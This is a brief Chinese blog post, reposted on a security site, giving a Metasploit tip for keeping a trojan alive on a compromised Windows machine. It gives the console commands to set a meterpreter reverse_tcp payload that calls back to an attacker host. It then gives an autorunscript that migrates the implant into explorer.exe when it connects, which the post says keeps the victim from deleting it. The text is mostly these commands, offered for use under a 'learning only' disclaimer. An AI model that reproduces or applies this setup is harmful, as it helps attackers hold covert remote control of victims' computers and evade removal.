msf渗透测试小技巧之防止木马被杀

JAVASEC 2021年1月19日08:34:54评论282 views字数 457阅读1分31秒阅读模式
摘要

msf 有时候我们在等马儿上线的时候会出现,刚上线没多久就被杀了。于是乎就有个设置选项是在目标运行木马与我们攻击机建立连接之后就会自动迁移木马到别的进程。

msf

说明

有时候我们在等马儿上线的时候会出现,刚上线没多久就被杀了。于是乎就有个设置选项是在目标运行木马与我们攻击机建立连接之后就会自动迁移木马到别的进程。

使用

比如在设置完payload后

set payload windows/meterpreter/reverse_tcp set lhost 1.0.0.2 set lport 654 。。。。。。。。 

在设置完了端口与HOST之类的基本信息后,在设置一下autorunscript

set autorunscript migrate -n explorer.exe 

上面命令意思是在目标上线后,你要执行的命令,这里我们将进程迁移到了资源管理器,防止用户删除木马,然后丢失目标的情况。

ps 如果出线掉线,重新监听一下,等等就好

来源:http://www.safe6.cn/

本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

msf渗透测试小技巧之防止木马被杀

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2019-08-23

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
JAVASEC
  • 本文由 发表于 2021年1月19日08:34:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   msf渗透测试小技巧之防止木马被杀https://cn-sec.com/archives/247516.html

发表评论

匿名网友 填写信息